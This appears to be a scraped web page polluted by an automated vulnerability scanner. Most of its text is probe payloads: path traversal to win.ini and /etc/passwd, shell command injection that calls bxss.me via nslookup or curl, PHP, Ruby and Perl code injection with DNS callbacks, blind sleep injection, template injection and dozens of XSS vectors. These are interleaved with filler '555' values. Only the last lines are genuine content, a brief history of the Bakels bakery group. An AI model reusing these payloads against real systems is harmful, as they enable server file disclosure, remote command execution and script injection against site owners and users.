/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
&nslookup -q=cname hitoqlxumvlzw572c0.bxss.me&'\"`0&nslookup -q=cname hitoqlxumvlzw572c0.bxss.me&`'
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
$(nslookup -q=cname hitgbglkzneuu25f54.bxss.me||curl hitgbglkzneuu25f54.bxss.me)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
(nslookup -q=cname hitktempznmbx778f3.bxss.me||curl hitktempznmbx778f3.bxss.me))
..\..\..\..\..\..\..\..\windows\win.ini
bxss.me
|echo xhsonc$()\ unrrbj\nz^xyu||a #' |echo xhsonc$()\ unrrbj\nz^xyu||a #|" |echo xhsonc$()\ unrrbj\nz^xyu||a #
c:/windows/win.ini
&echo mzwfro$()\ qkolaq\nz^xyu||a #' &echo mzwfro$()\ qkolaq\nz^xyu||a #|" &echo mzwfro$()\ qkolaq\nz^xyu||a #
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
/etc/shells
/../../../../../../../../../../boot.ini
http://bxss.me/t/fit.txt%3F.jpg
echo cecrwy$()\ pntmaf\nz^xyu||a #' &echo cecrwy$()\ pntmaf\nz^xyu||a #|" &echo cecrwy$()\ pntmaf\nz^xyu||a #
../../../../../../../../../../windows/win.ini%00.jpg
Http://bxss.me/t/fit.txt
C:\WINDOWS\system32\drivers\etc\hosts
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
file:///etc/passwd
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
../../../../../../../../../../../../../../windows/win.ini
'+'A'.concat(70-3).concat(22*4).concat(105).concat(84).concat(101).concat(75)+(require'socket'
Socket.gethostbyname('hitqd'+'gudsfgdnab727.bxss.me.')[3].to_s)+'
../../../../../../../../../../../../../../etc/passwd
"+"A".concat(70-3).concat(22*4).concat(117).concat(79).concat(98).concat(82)+(require"socket"
Socket.gethostbyname("hitiv"+"imorzjyf754b2.bxss.me.")[3].to_s)+"
"+response.write(9900590*9843377)+"
'+response.write(9900590*9843377)+'
bxss.me/t/xss.html?%00
response.write(9900590*9843377)
HttP://bxss.me/t/xss.html?%00
${9999426+9999265}
<esi:include src="http://bxss.me/rpb.png"/>
/../../../../../../../../../../windows/system32/BITSADMIN.exe
uazgCHVD
'.print(md5(31337)).'
${@print(md5(31337))}\
${@print(md5(31337))}
";print(md5(31337));$a="
';print(md5(31337));$a='
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
"||sleep(27*1000)*qmtwhh||"
'||sleep(27*1000)*fivxei||'
"&&sleep(27*1000)*uchscq&&"
'&&sleep(27*1000)*arxztu&&'
&n948800=v950367
'"()
^(#$!@#$)(()))******
!(()&&!|*|*|
)
".gethostbyname(lc("hitsu"."zfmxfykd38ef4.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(87).chr(100).chr(85)."
'.gethostbyname(lc('hitio'.'ujvfyrgn9123a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(84).chr(122).chr(68).'
1<aqGgwUL<
1<img sRc='http://attacker-9503/log.php?
1<awdmxrM x=9749>
1<ifRAme sRc=9451.com></IfRamE>
1<W7BL7M>OU4SD[!+!]</W7BL7M>
1J6QFp
<InvalidTag >lA0Q(9898)</ScRiPt>
1}body{zzz:Expre/**/SSion(lA0Q(9488))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=lA0Q(9269)>
�<img zzz onmouseover=lA0Q(90321) //�>
1<ScRiPt>lA0Q(9294)</sCripT>
1\u003CScRiPt\lA0Q(9836)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%6C%41%30%51%289872%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9891)>
1<img src=xyz OnErRor=lA0Q(9907)>
1<img src=//xss.bxss.me/t/dot.gif onload=lA0Q(9904)>
1<body onload=lA0Q(9560)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9795'>
1<isindex type=image src=1 onerror=lA0Q(9968)>
1<svg
� onload=lA0Q(9930);>
1<InvalidTag
>lA0Q(9427)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9369></ScRiPt>
1<InvalidTag
>lA0Q(9332)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6C%41%30%51%28%39%32%33%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>lA0Q(9016)</script>9016
1<InvalidTag>lA0Q(9147)</script>
1<WYAJEC>SV4PF[!+!]</WYAJEC>
1<InvalidTag >lA0Q(9476)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx10071%C0%BEz1%C0%BCz2a%90bcxhjl10071
bfg3046%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3046
19244500
'"()&%<zzz><InvalidTag >lA0Q(9619)</ScRiPt>
1'"()&%<zzz><InvalidTag >lA0Q(9029)</ScRiPt>
1<aGBhELR<
1<img sRc='http://attacker-9058/log.php?
1<aA7GYG0 x=9366>
1<ifRAme sRc=9305.com></IfRamE>
1<WLYB91>XZCIE[!+!]</WLYB91>
12xYcu
<InvalidTag >xj92(9253)</ScRiPt>
1}body{zzz:Expre/**/SSion(xj92(9767))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=xj92(9224)>
�<img zzz onmouseover=xj92(96101) //�>
1<ScRiPt>xj92(9145)</sCripT>
1\u003CScRiPt\xj92(9530)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%78%6A%39%32%289472%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9340)>
1<img src=xyz OnErRor=xj92(9612)>
1<img src=//xss.bxss.me/t/dot.gif onload=xj92(9500)>
1<body onload=xj92(9188)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9650'>
1<isindex type=image src=1 onerror=xj92(9992)>
1<svg
� onload=xj92(9142);>
1<InvalidTag
>xj92(9766)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9892></ScRiPt>
1<InvalidTag
>xj92(9096)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%78%6A%39%32%28%39%37%35%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>xj92(9907)</script>9907
1<InvalidTag>xj92(9006)</script>
1<WKR9VE>R00GP[!+!]</WKR9VE>
1<InvalidTag >xj92(9831)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx3310%C0%BEz1%C0%BCz2a%90bcxhjl3310
bfg7990%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7990
19095480
'"()&%<zzz><InvalidTag >xj92(9307)</ScRiPt>
1'"()&%<zzz><InvalidTag >xj92(9035)</ScRiPt>
WEB-INF\web.xml
WEB-INF/web.xml
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
;(nslookup -q=cname hitikljxupcje270e6.bxss.me||curl hitikljxupcje270e6.bxss.me)|(nslookup -q=cname hitikljxupcje270e6.bxss.me||curl hitikljxupcje270e6.bxss.me)&(nslookup -q=cname hitikljxupcje270e6.bxss.me||curl hitikljxupcje270e6.bxss.me)
/../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini%00.jpg
`(nslookup -q=cname hitxwvhsjthwd02888.bxss.me||curl hitxwvhsjthwd02888.bxss.me)`
C:\WINDOWS\system32\drivers\etc\hosts
|(nslookup -q=cname hitajpdgnxkin117ee.bxss.me||curl hitajpdgnxkin117ee.bxss.me)
/\xfs.bxss.me?hkbakels.com.hk
file:///etc/passwd
//xfs.bxss.me?hkbakels.com.hk
&(nslookup -q=cname hitpuqcvuagmjd73b1.bxss.me||curl hitpuqcvuagmjd73b1.bxss.me)&'\"`0&(nslookup -q=cname hitpuqcvuagmjd73b1.bxss.me||curl hitpuqcvuagmjd73b1.bxss.me)&`'
../../../../../../../../../../../../../../windows/win.ini
xfs.bxss.me?hkbakels.com.hk
&nslookup -q=cname hitepohtmjvlz6577e.bxss.me&'\"`0&nslookup -q=cname hitepohtmjvlz6577e.bxss.me&`'
$(nslookup -q=cname hitogsgnwlfplb7fb4.bxss.me||curl hitogsgnwlfplb7fb4.bxss.me)
../../../../../../../../../../../../../../etc/passwd
http://xfs.bxss.me?hkbakels.com.hk
(nslookup -q=cname hitnuqdtcxvpwed66b.bxss.me||curl hitnuqdtcxvpwed66b.bxss.me))
929838
bxss.me
|echo huebvv$()\ ftwjtc\nz^xyu||a #' |echo huebvv$()\ ftwjtc\nz^xyu||a #|" |echo huebvv$()\ ftwjtc\nz^xyu||a #
xfs.bxss.me
c:/windows/win.ini
&echo tlvppd$()\ xjezgu\nz^xyu||a #' &echo tlvppd$()\ xjezgu\nz^xyu||a #|" &echo tlvppd$()\ xjezgu\nz^xyu||a #
/etc/shells
http://bxss.me/t/fit.txt%3F.jpg
echo inaxwh$()\ ysxvol\nz^xyu||a #' &echo inaxwh$()\ ysxvol\nz^xyu||a #|" &echo inaxwh$()\ ysxvol\nz^xyu||a #
Http://bxss.me/t/fit.txt
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
19525404
'"()&%<zzz><InvalidTag >XyBV(9773)</ScRiPt>
1'"()&%<zzz><InvalidTag >XyBV(9092)</ScRiPt>
<!--
'"
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
${@print(md5(31337))}\
${@print(md5(31337))}
555
";print(md5(31337));$a="
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
"||sleep(27*1000)*ifyvpd||"
"+response.write(9479192*9498010)+"
';print(md5(31337));$a='
'||sleep(27*1000)*tqhddk||'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
'+response.write(9479192*9498010)+'
555
"&&sleep(27*1000)*yrsrld&&"
bxss.me/t/xss.html?%00
'&&sleep(27*1000)*apvnsp&&'
response.write(9479192*9498010)
HttP://bxss.me/t/xss.html?%00
'+'A'.concat(70-3).concat(22*4).concat(112).concat(87).concat(117).concat(69)+(require'socket'
Socket.gethostbyname('hiths'+'vcgpvlcbc24a3.bxss.me.')[3].to_s)+'
'"()
"+"A".concat(70-3).concat(22*4).concat(102).concat(69).concat(122).concat(78)+(require"socket"
Socket.gethostbyname("hitrs"+"fpcokgvu0bf8f.bxss.me.")[3].to_s)+"
555
555
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
^(#$!@#$)(()))******
!(()&&!|*|*|
)
${9999991+10000385}
555
./555
555
<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
".gethostbyname(lc("hitgv"."xxxbptvd0d9ae.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(79).chr(115).chr(74)."
555
'.gethostbyname(lc('hitwc'.'hzernlgi81159.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(65).chr(119).chr(78).'
../555
555
555
555
555
file:///etc/passwd
555
1Fhd69xSO
../../../../../../../../../../../../../../windows/win.ini
555
../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../windows/system32/BITSADMIN.exe
&n982075=v953946
VlJoAKtB
555
555
555
555
555
555
555
555
555
555
555
bxss.me
555
c:/windows/win.ini
/etc/shells
555
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
Http://bxss.me/t/fit.txt
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
555
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
${@print(md5(31337))}\
555
555
555
555
555
555
${@print(md5(31337))}
555
555
555
555
555
555
555
";print(md5(31337));$a="
555
555
';print(md5(31337));$a='
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(102).concat(74).concat(115).concat(75)+(require'socket'
555
555
"+"A".concat(70-3).concat(22*4).concat(106).concat(84).concat(104).concat(75)+(require"socket"
555
555
555
bxss.me
555
555
555
555
555
555
c:/windows/win.ini
./555
555
555
555
555
555
/etc/shells
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
555
555
555
555
../555
555
555
Http://bxss.me/t/fit.txt
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
file:///etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitnx"."mbfrjyxj95529.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(85).chr(99).chr(66)."
555
'.gethostbyname(lc('hitez'.'yxniocwzcd13b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(82).chr(100).chr(65).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
${@print(md5(31337))}\
555
555
${@print(md5(31337))}
555
555
";print(md5(31337));$a="
555
555
555
555
';print(md5(31337));$a='
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(109).concat(80).concat(119).concat(72)+(require'socket'
Socket.gethostbyname('hituc'+'nhifrpnh1e274.bxss.me.')[3].to_s)+'
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(121).concat(74).concat(115).concat(82)+(require"socket"
Socket.gethostbyname("hitmz"+"qgrabewk3db80.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitrk"."uepyxpuo4475f.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(83).chr(107).chr(88)."
'.gethostbyname(lc('hityd'.'odtchpln40335.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(84).chr(100).chr(80).'
555
555
555
555
555
555
555
555
555
555
555
555
The Bakels Group owes its name to the Dutch merchant brothers Bakels who registered the Gebr. Bakels company in Amsterdam, Netherlands in 1904. It was however the son of one of the brothers referred to above, Bernard J Bakels who would be the one to make the name Bakels known further afield than Central Europe.
Today the Bakels Group is truly global, represented on all continents through own manufacturing companies and slected agents. Bakels products are available to the bakery and confectionery industries in more than 120 countries.
555